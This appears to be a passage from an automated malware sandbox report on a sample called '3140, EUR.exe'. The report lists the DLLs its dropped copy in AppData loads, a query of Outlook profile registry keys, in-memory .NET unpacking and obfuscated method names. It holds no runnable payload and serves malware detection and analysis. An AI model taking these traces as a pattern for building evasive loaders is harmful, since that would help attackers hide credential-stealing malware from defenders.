Source: C:\Users\user\AppData\Roaming\lkuPOyvaWlIu.exe Section loaded: cryptbase.dll
Source: C:\Users\user\AppData\Roaming\lkuPOyvaWlIu.exe Section loaded: rasapi32.dll
Source: C:\Users\user\AppData\Roaming\lkuPOyvaWlIu.exe Section loaded: rasman.dll
Source: C:\Users\user\AppData\Roaming\lkuPOyvaWlIu.exe Section loaded: rtutils.dll
Source: C:\Users\user\AppData\Roaming\lkuPOyvaWlIu.exe Section loaded: mswsock.dll
Source: C:\Users\user\AppData\Roaming\lkuPOyvaWlIu.exe Section loaded: winhttp.dll
Source: C:\Users\user\AppData\Roaming\lkuPOyvaWlIu.exe Section loaded: ondemandconnroutehelper.dll
Source: C:\Users\user\AppData\Roaming\lkuPOyvaWlIu.exe Section loaded: iphlpapi.dll
Source: C:\Users\user\AppData\Roaming\lkuPOyvaWlIu.exe Section loaded: dhcpcsvc6.dll
Source: C:\Users\user\AppData\Roaming\lkuPOyvaWlIu.exe Section loaded: dhcpcsvc.dll
Source: C:\Users\user\AppData\Roaming\lkuPOyvaWlIu.exe Section loaded: dnsapi.dll
Source: C:\Users\user\AppData\Roaming\lkuPOyvaWlIu.exe Section loaded: winnsi.dll
Source: C:\Users\user\AppData\Roaming\lkuPOyvaWlIu.exe Section loaded: rasadhlp.dll
Source: C:\Users\user\AppData\Roaming\lkuPOyvaWlIu.exe Section loaded: fwpuclnt.dll
Source: C:\Users\user\AppData\Roaming\lkuPOyvaWlIu.exe Section loaded: secur32.dll
Source: C:\Users\user\AppData\Roaming\lkuPOyvaWlIu.exe Section loaded: sspicli.dll
Source: C:\Users\user\AppData\Roaming\lkuPOyvaWlIu.exe Section loaded: schannel.dll
Source: C:\Users\user\AppData\Roaming\lkuPOyvaWlIu.exe Section loaded: mskeyprotect.dll
Source: C:\Users\user\AppData\Roaming\lkuPOyvaWlIu.exe Section loaded: ntasn1.dll
Source: C:\Users\user\AppData\Roaming\lkuPOyvaWlIu.exe Section loaded: ncrypt.dll
Source: C:\Users\user\AppData\Roaming\lkuPOyvaWlIu.exe Section loaded: ncryptsslp.dll
Source: C:\Users\user\AppData\Roaming\lkuPOyvaWlIu.exe Section loaded: msasn1.dll
Source: C:\Users\user\AppData\Roaming\lkuPOyvaWlIu.exe Section loaded: gpapi.dll
Source: C:\Users\user\AppData\Roaming\lkuPOyvaWlIu.exe Section loaded: dpapi.dll
Source: C:\Users\user\Desktop\3140, EUR.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0EE7644B-1BAD-48B1-9889-0281C206EB85}\InprocServer32 Jump to behavior
Source: Window Recorder Window detected: More than 3 window changes detected
Source: C:\Users\user\Desktop\3140, EUR.exe File opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dll Jump to behavior
Source: C:\Users\user\Desktop\3140, EUR.exe Key opened: HKEY_CURRENT_USER\Software\Microsoft\Office\15.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 Jump to behavior
Source: 3140, EUR.exe Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR
Source: 3140, EUR.exe Static PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
Source: 3140, EUR.exe Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
Source: Binary string: OqNV.pdb source: 3140, EUR.exe, lkuPOyvaWlIu.exe.0.dr
Source: Binary string: OqNV.pdbSHA256/{ source: 3140, EUR.exe, lkuPOyvaWlIu.exe.0.dr
Source: Binary string: OqNV.pdb|D source: 3140, EUR.exe, 00000000.00000002.1740034846.000000000741E000.00000004.00000020.00020000.00000000.sdmp

Data Obfuscation
barindex
.NET source code contains potential unpacker
Source: 0.2.3140, EUR.exe.4312dc0.3.raw.unpack, SwCftK6S58okDsOPI5.cs .Net Code: Y98Z3ocCGC System.Reflection.Assembly.Load(byte[])
Source: 0.2.3140, EUR.exe.3831c20.2.raw.unpack, MainForm.cs .Net Code: _200E_200C_200B_202B_202E_200E_200E_202D_200B_206C_202C_202B_200B_200F_200E_206F_206C_202C_202D_200E_206E_206E_200C_206D_202C_200B_200E_202B_200B_206A_202E_206A_202E_206E_206E_206A_206C_206A_206F_202E_202E System.Reflection.Assembly.Load(byte[])
Source: 0.2.3140, EUR.exe.9fd0000.5.raw.unpack, SwCftK6S58okDsOPI5.cs .Net Code: Y98Z3ocCGC System.Reflection.Assembly.Load(byte[])
Source: 0.2.3140, EUR.exe.428dba0.0.raw.unpack, SwCftK6S58okDsOPI5.cs .Net Code: Y98Z3ocCGC System.Reflection.Assembly.Load(byte[])
Source: 0.2.3140, EUR.exe.7600000.4.raw.unpack, MainForm.cs .Net Code: _200E_200C_200B_202B_202E_200E_200E_202D_200B_206C_202C_202B_200B_200F_200E_206F_206C_202C_202D_200E_206E_206E_200C_206D_202C_200B_200E_202B_200B_206A_202E_206A_202E_206E_206E_206A_206C_206A_206F_202E_202E System.Reflection.Assembly.Load(byte[])
Uses code obfuscation techniques (call, push, ret)
Source: C:\Users\user\Desktop\3140, EUR.exe Code function: 0_2_07857080 pushad ; ret 0_2_07857081
Source: C:\Users\user\Desktop\3140, EUR.exe Code function: 0_2_07857082 push esp; ret 0_2_07857089
Source: C:\Users\user\Desktop\3140, EUR.exe Code function: 0_2_07853E78 push eax; mov dword ptr [esp], ecx 0_2_07853E7C
Source: C:\Users\user\AppData\Roaming\lkuPOyvaWlIu.exe Code function: 9_2_01080D92 pushfd ; iretd 9_2_01080DF9
Source: C:\Users\user\AppData\Roaming\lkuPOyvaWlIu.exe Code function: 9_2_01080DFA pushfd ; iretd 9_2_01080DF9
Source: C:\Users\user\AppData\Roaming\lkuPOyvaWlIu.exe Code function: 9_2_0763B7CC push esp; iretd 9_2_0763B7CD
Source: C:\Users\user\AppData\Roaming\lkuPOyvaWlIu.exe Code function: 9_2_0763B7DD push ebp; iretd 9_2_0763B7DE
Source: C:\Users\user\AppData\Roaming\lkuPOyvaWlIu.exe Code function: 9_2_0763B7B5 push ebx; iretd 9_2_0763B7B7
Source: C:\Users\user\AppData\Roaming\lkuPOyvaWlIu.exe Code function: 9_2_0763766B push ebp; iretd 9_2_07637672
Source: C:\Users\user\AppData\Roaming\lkuPOyvaWlIu.exe Code function: 9_2_07637633 push ebp; iretd 9_2_07637642
Source: C:\Users\user\AppData\Roaming\lkuPOyvaWlIu.exe Code function: 9_2_076376AF push esi; iretd 9_2_076376B2
Source: C:\Users\user\AppData\Roaming\lkuPOyvaWlIu.exe Code function: 9_2_07637693 push esi; iretd 9_2_076376A2
Source: C:\Users\user\AppData\Roaming\lkuPOyvaWlIu.exe Code function: 9_2_076375C3 push ebx; iretd 9_2_076375D2
Source: C:\Users\user\AppData\Roaming\lkuPOyvaWlIu.exe Code function: 9_2_0763B5C1 push esp; iretd 9_2_0763B5C3
Source: C:\Users\user\AppData\Roaming\lkuPOyvaWlIu.exe Code function: 9_2_076375D3 push esp; iretd 9_2_07637602
Source: C:\Users\user\AppData\Roaming\lkuPOyvaWlIu.exe Code function: 9_2_076375B3 push ebx; iretd 9_2_076375C2
Source: C:\Users\user\AppData\Roaming\lkuPOyvaWlIu.exe Code function: 9_2_0763B5B0 push ebp; iretd 9_2_0763B5B1
Source: C:\Users\user\AppData\Roaming\lkuPOyvaWlIu.exe Code function: 9_2_0763E1CB push esp; iretd 9_2_0763E1D6
Source: C:\Users\user\AppData\Roaming\lkuPOyvaWlIu.exe Code function: 9_2_0763BC67 push esi; iretd 9_2_0763BC68
Source: C:\Users\user\AppData\Roaming\lkuPOyvaWlIu.exe Code function: 9_2_0763BC78 push esp; iretd 9_2_0763BC7A
Source: C:\Users\user\AppData\Roaming\lkuPOyvaWlIu.exe Code function: 9_2_0763BC55 push ebx; iretd 9_2_0763BC57
Source: C:\Users\user\AppData\Roaming\lkuPOyvaWlIu.exe Code function: 9_2_0763BC3F push ebx; iretd 9_2_0763BC41
Source: C:\Users\user\AppData\Roaming\lkuPOyvaWlIu.exe Code function: 9_2_0763BBE4 push esp; iretd 9_2_0763BBE6
Source: C:\Users\user\AppData\Roaming\lkuPOyvaWlIu.exe Code function: 9_2_0763BBD3 push esi; iretd 9_2_0763BBD4
Source: C:\Users\user\AppData\Roaming\lkuPOyvaWlIu.exe Code function: 9_2_0763BA71 push esp; iretd 9_2_0763BA72
Source: C:\Users\user\AppData\Roaming\lkuPOyvaWlIu.exe Code function: 9_2_0763BAA9 push esp; iretd 9_2_0763BAAB
Source: C:\Users\user\AppData\Roaming\lkuPOyvaWlIu.exe Code function: 9_2_0763BA98 push esi; iretd 9_2_0763BA99
Source: C:\Users\user\AppData\Roaming\lkuPOyvaWlIu.exe Code function: 9_2_0763B8F0 push ebx; iretd 9_2_0763B8F2
Source: C:\Users\user\AppData\Roaming\lkuPOyvaWlIu.exe Code function: 9_2_0763B8C9 push esp; iretd 9_2_0763B8CB
Source: C:\Users\user\AppData\Roaming\lkuPOyvaWlIu.exe Code function: 9_2_0763B8A7 push esp; iretd 9_2_0763B8A8
Source: C:\Users\user\AppData\Roaming\lkuPOyvaWlIu.exe Code function: 9_2_0763B8B8 push esi; iretd 9_2_0763B8B9
Source: 3140, EUR.exe Static PE information: section name: .text entropy: 7.773152694651227
Source: lkuPOyvaWlIu.exe.0.dr Static PE information: section name: .text entropy: 7.773152694651227
Source: 0.2.3140, EUR.exe.4312dc0.3.raw.unpack, r35OtXmVa9mbccyjMN.cs High entropy of concatenated method names: 'GqN9A6Nu4o', 'HY99ceitjo', 'u7h9UpcmJd', 'QAh9J9v5fP', 'sI097b0Rns', 'FDm9xINIbs', 'WmU9dkDDfS', 'jLg9LqBfYT', 'nM690fTZBY', 'Vjv9GF6unO'
Source: 0.2.3140, EUR.exe.4312dc0.3.raw.unpack, IaNmoTU1Jas5HiM3Qc.cs High entropy of concatenated method names: 'NU9tFHp9wM', 'Xt3tgqpOUW', 'vkatny9ZeY', 'XkXtOZyo7N', 'Nr4t68apne', 'UotnEQ2NDd', 'KPLnuglZau', 'pI9nS9V4XI', 'EROnqWn4Rf', 'LBmnKpfMWa'
Source: 0.2.3140, EUR.exe.4312dc0.3.raw.unpack, pnbAqGRE0nfnZVOLAq.cs High entropy of concatenated method names: 'WDZnhGnyPl', 'HKUnencVPS', 'D67P2SMoNA', 'vcMP7nDIYp', 'EwsPxs5dK3', 'bEvPNTTeCZ', 'iILPdy2bA8', 'LqGPLuxKGj', 'McWPMhMmAC', 'O11P0RNTOw'
Source: 0.2.3140, EUR.exe.4312dc0.3.raw.unpack, DgRGmDbjU6lUJhfE0v8.cs High entropy of concatenated method names: 'Q4gIobQTJ8', 'KWNIHTEJ1U', 'iuTI30J0uV', 'CiDIiyiTDd', 'pixIhySfPL', 'yvtITgMiJD', 'yvGIe5ejf5', 'WcOIAwXiq2', 'vYwIctymfh', 'KTPIRN74xQ'
Source: 0.2.3140, EUR.exe.4312dc0.3.raw.unpack, SwCftK6S58okDsOPI5.cs High entropy of concatenated method names: 'mDC1F5ltau', 'tjx1yOlwS4', 'kwD1gP2LKW', 'c9a1PyosR3', 'Vvd1n0hi5L', 'ntV1tj2eIq', 'kQM1Oy0TGk', 'p6b1692Csb', 'e8b1rosvOx', 'xQZ1WkV8GJ'
Source: 0.2.3140, EUR.exe.4312dc0.3.raw.unpack, clSYfYveg2noAM7P8e.cs High entropy of concatenated method names: 'zaw3vYJ4j', 'o7ZixLHgG', 'slFT8l8fa', 'LsreWu3f4', 'PJ4cWU7FJ', 'oYXRUeRCt', 'jUvTWwDYFDErknv2Yj', 'N69VBpyC4Pe0SVqBKs', 'PALagLMvR', 'rmbQ5Ef4Z'
Source: 0.2.3140, EUR.exe.4312dc0.3.raw.unpack, k9RBG6DgUfX4TknVHW.cs High entropy of concatenated method names: 'pwGIbi3Nr6', 'o5QI1qmcrr', 'xXSIZjhFbH', 'z32IyPorgr', 'HShIgQ5IfA', 'D1FInV51O6', 'NjuItTFKqN', 'qjraScI4Pl', 'pXJaq1RNdP', 'c0ZaKLWkId'
Source: 0.2.3140, EUR.exe.4312dc0.3.raw.unpack, DZt0vvzJwZJilcpPKx.cs High entropy of concatenated method names: 'CanConvertFrom', 'ConvertFrom', 'ConvertTo', 'W4dI9t8Yp5', 'c46IwoIdLE', 'RDHIfjAALG', 'djaI88TWbu', 'geSIaX9G3U', 'kLBIIiUOlY', 'tb5IQs107j'
Source: 0.2.3140, EUR.exe.4312dc0.3.raw.unpack, okXpofgYeVULwIjxF3.cs High entropy of concatenated method names: 'Dispose', 'G9xbKnYpPX', 'NIUvJBjByq', 'z3Ell8RTx7', 'V1xbDJt6jq', 'N6XbzAko1d', 'ProcessDialogKey', 'qIhvjNDjby', 'UiDvbpGcvS', 'lK6vv69RBG'
Source: 0.2.3140, EUR.exe.4312dc0.3.raw.unpack, MU4Oupc1dL6Nvwl4EF.cs High entropy of concatenated method names: 'UZlPi1EFky', 'kMwPTrTb3E', 'S4tPAfFKQV', 'TkpPcjHuyO', 'OVhPwQ9Mkf', 'tNNPfSRpkZ', 'sbQP8yc3h0', 'Bk6PabtRGE', 'GfyPIUPLvy', 'e1nPQIS6uG'
Source: 0.2.3140, EUR.exe.4312dc0.3.raw.unpack, jHN6pNdJjWN1aRaPiD.cs High entropy of concatenated method names: 'PPWOy6bVhC', 'ATAOPMst2D', 'UucOtTDklA', 'kHRtDnXeDV', 'd6jtz6Flk8', 'nuBOj4JCNs', 'CMIObyGNWb', 'wN0OvguPFP', 'PfRO1xE4ao', 'zHDOZLdog4'
Source: 0.2.3140, EUR.exe.4312dc0.3.raw.unpack, jDZx6yMTIJBBgdc5M9.cs High entropy of concatenated method names: 'r6yOodSaw5', 'hxPOHYrow8', 'N8EO3rHnY2', 'YJ7OigrIYF', 'RZCOh3gLVY', 'n1vOT1ewCW', 'WiGOexAc77', 'rFGOAoXNM6', 'xtaOcO7p35', 'n3MORrUdXs'
Source: 0.2.3140, EUR.exe.4312dc0.3.raw.unpack, c43BOPb17cTkFlcAFvH.cs High entropy of concatenated method names: 'CanConvertFrom', 'ConvertFrom', 'ConvertTo', 'wJTQVKTOlQ', 'D13Qsw5gtr', 'YvYQYZynJx', 'udqQkun7f0', 'wq8QEfdWml', 'auYQurFs2x', 'TO0QSablKt'
Source: 0.2.3140, EUR.exe.4312dc0.3.raw.unpack, JaiguuulGFOV4gjVP9.cs High entropy of concatenated method names: 'Lly8qWMWPl', 'uEC8Dfy0PB', 'vxHajrQ2nt', 'zwPabruD86', 'WPT8GMJtUa', 'Dgu8XI6Duh', 'WcN8mPROuG', 'FPi8VVirr5', 'Sv88sEZQQg', 'Gj38YidP0k'
Source: 0.2.3140, EUR.exe.4312dc0.3.raw.unpack, onTDHLANSwQB4GuLwN.cs High entropy of concatenated method names: 'j85gV69F7r', 'fQBgsJP8am', 'DrogYioepT', 'STxgk2JVed', 'YZegEenEPY', 'gUlguBYDUy', 'HM4gS3HYvN', 'wcngqNglPH', 'rHsgKM2jnY', 'pdSgD7eY8H'
Source: 0.2.3140, EUR.exe.4312dc0.3.raw.unpack, IYkmttbvFwlONMhZ0Rx.cs High entropy of concatenated method names: 'kMQQotPATr', 'DvbQHHRfF4', 'YppQ3EC2ta', 'soxiwxLhn64WOuaRTjx', 'hfOZ0vLDSJYTJd5yiSX', 'ABEoHqLyq7Mlqo8ZsID', 'VDNC2BLijpO2avvODsu'
Source: 0.2.3140, EUR.exe.4312dc0.3.raw.unpack, BNDjbyKEiDpGcvSWK6.cs High entropy of concatenated method names: 's4OaUwRsN5', 'omxaJO2h34', 'o1ja2jO0ZA', 'VZwa7kFRkK', 'g5OaVtx0EM', 'I82ax1xx4K', 'Next', 'Next', 'Next', 'NextBytes'
Source: 0.2.3140, EUR.exe.4312dc0.3.raw.unpack, kBEQvpZQ0mEMjME0yK.cs High entropy of concatenated method names: 'OiwbOnTDHL', 'KSwb6QB4Gu', 'u1dbWL6Nvw', 'm4EblFfnbA', 'ROLbwAq7aN', 'QoTbf1Jas5', 'd1IOlxRikxuKcwmNfd', 'OAkZTBWMrF62p7bvaJ', 'TjKbbdlqL5', 'ctpb1vNpUo'
Source: 0.2.3140, EUR.exe.4312dc0.3.raw.unpack, cxJt6jqq06XAko1daI.cs High entropy of concatenated method names: 'MjFayewvC6', 'LaAagwfh9r', 'putaPiDfAL', 'xMxan3XE2N', 'cDCatphpn2', 'NohaOxuoAG', 'e1ea6Zbxay', 'foYarmwqf4', 'Q6NaWUVRP3', 'HvAalfQDL5'
Source: 0.2.3140, EUR.exe.4312dc0.3.raw.unpack, a5HLPykg5ohEWJsiPN.cs High entropy of concatenated method names: 'CbW8WePhVD', 'XcM8lHcDOD', 'ToString', 'AnT8yq2R3M', 'HSA8gpxrBs', 'arR8PAG5b7', 'ori8no1XOc', 'z9E8tGlT7n', 'GD38ObUWPP', 'kqH86cXkdf'
Source: 0.2.3140, EUR.exe.9fd0000.5.raw.unpack, r35OtXmVa9mbccyjMN.cs High entropy of concatenated method names: 'GqN9A6Nu4o', 'HY99ceitjo', 'u7h9UpcmJd', 'QAh9J9v5fP', 'sI097b0Rns', 'FDm9xINIbs', 'WmU9dkDDfS', 'jLg9LqBfYT', 'nM690fTZBY', 'Vjv9GF6unO'
Source: 0.2.3140, EUR.exe.9fd0000.5.raw.unpack, IaNmoTU1Jas5HiM3Qc.cs High entropy of concatenated method names: 'NU9tFHp9wM', 'Xt3tgqpOUW', 'vkatny9ZeY', 'XkXtOZyo7N', 'Nr4t68apne', 'UotnEQ2NDd', 'KPLnuglZau', 'pI9nS9V4XI', 'EROnqWn4Rf', 'LBmnKpfMWa'
Source: 0.2.3140, EUR.exe.9fd0000.5.raw.unpack, pnbAqGRE0nfnZVOLAq.cs High entropy of concatenated method names: 'WDZnhGnyPl', 'HKUnencVPS', 'D67P2SMoNA', 'vcMP7nDIYp', 'EwsPxs5dK3', 'bEvPNTTeCZ', 'iILPdy2bA8', 'LqGPLuxKGj', 'McWPMhMmAC', 'O11P0RNTOw'
Source: 0.2.3140, EUR.exe.9fd0000.5.raw.unpack, DgRGmDbjU6lUJhfE0v8.cs High entropy of concatenated method names: 'Q4gIobQTJ8', 'KWNIHTEJ1U', 'iuTI30J0uV', 'CiDIiyiTDd', 'pixIhySfPL', 'yvtITgMiJD', 'yvGIe5ejf5', 'WcOIAwXiq2', 'vYwIctymfh', 'KTPIRN74xQ'
Source: 0.2.3140, EUR.exe.9fd0000.5.raw.unpack, SwCftK6S58okDsOPI5.cs High entropy of concatenated method names: 'mDC1F5ltau', 'tjx1yOlwS4', 'kwD1gP2LKW', 'c9a1PyosR3', 'Vvd1n0hi5L', 'ntV1tj2eIq', 'kQM1Oy0TGk', 'p6b1692Csb', 'e8b1rosvOx', 'xQZ1WkV8GJ'
Source: 0.2.3140, EUR.exe.9fd0000.5.raw.unpack, clSYfYveg2noAM7P8e.cs High entropy of concatenated method names: 'zaw3vYJ4j', 'o7ZixLHgG', 'slFT8l8fa', 'LsreWu3f4', 'PJ4cWU7FJ', 'oYXRUeRCt', 'jUvTWwDYFDErknv2Yj', 'N69VBpyC4Pe0SVqBKs', 'PALagLMvR', 'rmbQ5Ef4Z'
Source: 0.2.3140, EUR.exe.9fd0000.5.raw.unpack, k9RBG6DgUfX4TknVHW.cs High entropy of concatenated method names: 'pwGIbi3Nr6', 'o5QI1qmcrr', 'xXSIZjhFbH', 'z32IyPorgr', 'HShIgQ5IfA', 'D1FInV51O6', 'NjuItTFKqN', 'qjraScI4Pl', 'pXJaq1RNdP', 'c0ZaKLWkId'
Source: 0.2.3140, EUR.exe.9fd0000.5.raw.unpack, DZt0vvzJwZJilcpPKx.cs High entropy of concatenated method names: 'CanConvertFrom', 'ConvertFrom', 'ConvertTo', 'W4dI9t8Yp5', 'c46IwoIdLE', 'RDHIfjAALG', 'djaI88TWbu', 'geSIaX9G3U', 'kLBIIiUOlY', 'tb5IQs107j'
Source: 0.2.3140, EUR.exe.9fd0000.5.raw.unpack, okXpofgYeVULwIjxF3.cs High entropy of concatenated method names: 'Dispose', 'G9xbKnYpPX', 'NIUvJBjByq', 'z3Ell8RTx7', 'V1xbDJt6jq', 'N6XbzAko1d', 'ProcessDialogKey', 'qIhvjNDjby', 'UiDvbpGcvS', 'lK6vv69RBG'
Source: 0.2.3140, EUR.exe.9fd0000.5.raw.unpack, MU4Oupc1dL6Nvwl4EF.cs High entropy of concatenated method names: 'UZlPi1EFky', 'kMwPTrTb3E', 'S4tPAfFKQV', 'TkpPcjHuyO', 'OVhPwQ9Mkf', 'tNNPfSRpkZ', 'sbQP8yc3h0', 'Bk6PabtRGE', 'GfyPIUPLvy', 'e1nPQIS6uG'
Source: 0.2.3140, EUR.exe.9fd0000.5.raw.unpack, jHN6pNdJjWN1aRaPiD.cs High entropy of concatenated method names: 'PPWOy6bVhC', 'ATAOPMst2D', 'UucOtTDklA', 'kHRtDnXeDV', 'd6jtz6Flk8', 'nuBOj4JCNs', 'CMIObyGNWb', 'wN0OvguPFP', 'PfRO1xE4ao', 'zHDOZLdog4'
Source: 0.2.3140, EUR.exe.9fd0000.5.raw.unpack, jDZx6yMTIJBBgdc5M9.cs High entropy of concatenated method names: 'r6yOodSaw5', 'hxPOHYrow8', 'N8EO3rHnY2', 'YJ7OigrIYF', 'RZCOh3gLVY', 'n1vOT1ewCW', 'WiGOexAc77', 'rFGOAoXNM6', 'xtaOcO7p35', 'n3MORrUdXs'
Source: 0.2.3140, EUR.exe.9fd0000.5.raw.unpack, c43BOPb17cTkFlcAFvH.cs High entropy of concatenated method names: 'CanConvertFrom', 'ConvertFrom', 'ConvertTo', 'wJTQVKTOlQ', 'D13Qsw5gtr', 'YvYQYZynJx', 'udqQkun7f0', 'wq8QEfdWml', 'auYQurFs2x', 'TO0QSablKt'
Source: 0.2.3140, EUR.exe.9fd0000.5.raw.unpack, JaiguuulGFOV4gjVP9.cs High entropy of concatenated method names: 'Lly8qWMWPl', 'uEC8Dfy0PB', 'vxHajrQ2nt', 'zwPabruD86', 'WPT8GMJtUa', 'Dgu8XI6Duh', 'WcN8mPROuG', 'FPi8VVirr5', 'Sv88sEZQQg', 'Gj38YidP0k'
Source: 0.2.3140, EUR.exe.9fd0000.5.raw.unpack, onTDHLANSwQB4GuLwN.cs High entropy of concatenated method names: 'j85gV69F7r', 'fQBgsJP8am', 'DrogYioepT', 'STxgk2JVed', 'YZegEenEPY', 'gUlguBYDUy', 'HM4gS3HYvN', 'wcngqNglPH', 'rHsgKM2jnY', 'pdSgD7eY8H'
Source: 0.2.3140, EUR.exe.9fd0000.5.raw.unpack, IYkmttbvFwlONMhZ0Rx.cs High entropy of concatenated method names: 'kMQQotPATr', 'DvbQHHRfF4', 'YppQ3EC2ta', 'soxiwxLhn64WOuaRTjx', 'hfOZ0vLDSJYTJd5yiSX', 'ABEoHqLyq7Mlqo8ZsID', 'VDNC2BLijpO2avvODsu'
Source: 0.2.3140, EUR.exe.9fd0000.5.raw.unpack, BNDjbyKEiDpGcvSWK6.cs High entropy of concatenated method names: 's4OaUwRsN5', 'omxaJO2h34', 'o1ja2jO0ZA', 'VZwa7kFRkK', 'g5OaVtx0EM', 'I82ax1xx4K', 'Next', 'Next', 'Next', 'NextBytes'
Source: 0.2.3140, EUR.exe.9fd0000.5.raw.unpack, kBEQvpZQ0mEMjME0yK.cs High entropy of concatenated method names: 'OiwbOnTDHL', 'KSwb6QB4Gu', 'u1dbWL6Nvw', 'm4EblFfnbA', 'ROLbwAq7aN', 'QoTbf1Jas5', 'd1IOlxRikxuKcwmNfd', 'OAkZTBWMrF62p7bvaJ', 'TjKbbdlqL5', 'ctpb1vNpUo'
Source: 0.2.3140, EUR.exe.9fd0000.5.raw.unpack, cxJt6jqq06XAko1daI.cs High entropy of concatenated method names: 'MjFayewvC6', 'LaAagwfh9r', 'putaPiDfAL', 'xMxan3XE2N', 'cDCatphpn2', 'NohaOxuoAG', 'e1ea6Zbxay', 'foYarmwqf4', 'Q6NaWUVRP3', 'HvAalfQDL5'
Source: 0.2.3140, EUR.exe.9fd0000.5.raw.unpack, a5HLPykg5ohEWJsiPN.cs High entropy of concatenated method names: 'CbW8WePhVD', 'XcM8lHcDOD', 'ToString', 'AnT8yq2R3M', 'HSA8gpxrBs', 'arR8PAG5b7', 'ori8no1XOc', 'z9E8tGlT7n', 'GD38ObUWPP', 'kqH86cXkdf'
Source: 0.2.3140, EUR.exe.428dba0.0.raw.unpack, r35OtXmVa9mbccyjMN.cs High entropy of concatenated method names: 'GqN9A6Nu4o', 'HY99ceitjo', 'u7h9UpcmJd', 'QAh9J9v5fP', 'sI097b0Rns', 'FDm9xINIbs', 'WmU9dkDDfS', 'jLg9LqBfYT', 'nM690fTZBY', 'Vjv9GF6unO'
Source: 0.2.3140, EUR.exe.428dba0.0.raw.unpack, IaNmoTU1Jas5HiM3Qc.cs High entropy of concatenated method names: 'NU9tFHp9wM', 'Xt3tgqpOUW', 'vkatny9ZeY', 'XkXtOZyo7N', 'Nr4t68apne', 'UotnEQ2NDd', 'KPLnuglZau', 'pI9nS9V4XI', 'EROnqWn4Rf', 'LBmnKpfMWa'
Source: 0.2.3140, EUR.exe.428dba0.0.raw.unpack, pnbAqGRE0nfnZVOLAq.cs High entropy of concatenated method names: 'WDZnhGnyPl', 'HKUnencVPS', 'D67P2SMoNA', 'vcMP7nDIYp', 'EwsPxs5dK3', 'bEvPNTTeCZ', 'iILPdy2bA8', 'LqGPLuxKGj', 'McWPMhMmAC', 'O11P0RNTOw'
Source: 0.2.3140, EUR.exe.428dba0.0.raw.unpack, DgRGmDbjU6lUJhfE0v8.cs High entropy of concatenated method names: 'Q4gIobQTJ8', 'KWNIHTEJ1U', 'iuTI30J0uV', 'CiDIiyiTDd', 'pixIhySfPL', 'yvtITgMiJD', 'yvGIe5ejf5', 'WcOIAwXiq2', 'vYwIctymfh', 'KTPIRN74xQ'
Source: 0.2.3140, EUR.exe.428dba0.0.raw.unpack, SwCftK6S58okDsOPI5.cs High entropy of concatenated method names: 'mDC1F5ltau', 'tjx1yOlwS4', 'kwD1gP2LKW', 'c9a1PyosR3', 'Vvd1n0hi5L', 'ntV1tj2eIq', 'kQM1Oy0TGk', 'p6b1692Csb', 'e8b1rosvOx', 'xQZ1WkV8GJ'
Source: 0.2.3140, EUR.exe.428dba0.0.raw.unpack, clSYfYveg2noAM7P8e.cs High entropy of concatenated method names: 'zaw3vYJ4j', 'o7ZixLHgG', 'slFT8l8fa', 'LsreWu3f4', 'PJ4cWU7FJ', 'oYXRUeRCt', 'jUvTWwDYFDErknv2Yj', 'N69VBpyC4Pe0SVqBKs', 'PALagLMvR', 'rmbQ5Ef4Z'
Source: 0.2.3140, EUR.exe.428dba0.0.raw.unpack, k9RBG6DgUfX4TknVHW.cs High entropy of concatenated method names: 'pwGIbi3Nr6', 'o5QI1qmcrr', 'xXSIZjhFbH', 'z32IyPorgr', 'HShIgQ5IfA', 'D1FInV51O6', 'NjuItTFKqN', 'qjraScI4Pl', 'pXJaq1RNdP', 'c0ZaKLWkId'
Source: 0.2.3140, EUR.exe.428dba0.0.raw.unpack, DZt0vvzJwZJilcpPKx.cs High entropy of concatenated method names: 'CanConvertFrom', 'ConvertFrom', 'ConvertTo', 'W4dI9t8Yp5', 'c46IwoIdLE', 'RDHIfjAALG', 'djaI88TWbu', 'geSIaX9G3U', 'kLBIIiUOlY', 'tb5IQs107j'
Source: 0.2.3140, EUR.exe.428dba0.0.raw.unpack, okXpofgYeVULwIjxF3.cs High entropy of concatenated method names: 'Dispose', 'G9xbKnYpPX', 'NIUvJBjByq', 'z3Ell8RTx7', 'V1xbDJt6jq', 'N6XbzAko1d', 'ProcessDialogKey', 'qIhvjNDjby', 'UiDvbpGcvS', 'lK6vv69RBG'
Source: 0.2.3140, EUR.exe.428dba0.0.raw.unpack, MU4Oupc1dL6Nvwl4EF.cs High entropy of concatenated method names: 'UZlPi1EFky', 'kMwPTrTb3E', 'S4tPAfFKQV', 'TkpPcjHuyO', 'OVhPwQ9Mkf', 'tNNPfSRpkZ', 'sbQP8yc3h0', 'Bk6PabtRGE', 'GfyPIUPLvy', 'e1nPQIS6uG'
Source: 0.2.3140, EUR.exe.428dba0.0.raw.unpack, jHN6pNdJjWN1aRaPiD.cs High entropy of concatenated method names: 'PPWOy6bVhC', 'ATAOPMst2D', 'UucOtTDklA', 'kHRtDnXeDV', 'd6jtz6Flk8', 'nuBOj4JCNs', 'CMIObyGNWb', 'wN0OvguPFP', 'PfRO1xE4ao', 'zHDOZLdog4'
Source: 0.2.3140, EUR.exe.428dba0.0.raw.unpack, jDZx6yMTIJBBgdc5M9.cs High entropy of concatenated method names: 'r6yOodSaw5', 'hxPOHYrow8', 'N8EO3rHnY2', 'YJ7OigrIYF', 'RZCOh3gLVY', 'n1vOT1ewCW', 'WiGOexAc77', 'rFGOAoXNM6', 'xtaOcO7p35', 'n3MORrUdXs'
Source: 0.2.3140, EUR.exe.428dba0.0.raw.unpack, c43BOPb17cTkFlcAFvH.cs High entropy of concatenated method names: 'CanConvertFrom', 'ConvertFrom', 'ConvertTo', 'wJTQVKTOlQ', 'D13Qsw5gtr', 'YvYQYZynJx', 'udqQkun7f0', 'wq8QEfdWml', 'auYQurFs2x', 'TO0QSablKt'
Source: 0.2.3140, EUR.exe.428dba0.0.raw.unpack, JaiguuulGFOV4gjVP9.cs High entropy of concatenated method names: 'Lly8qWMWPl', 'uEC8Dfy0PB', 'vxHajrQ2nt', 'zwPabruD86', 'WPT8GMJtUa', 'Dgu8XI6Duh', 'WcN8mPROuG', 'FPi8VVirr5', 'Sv88sEZQQg', 'Gj38YidP0k'
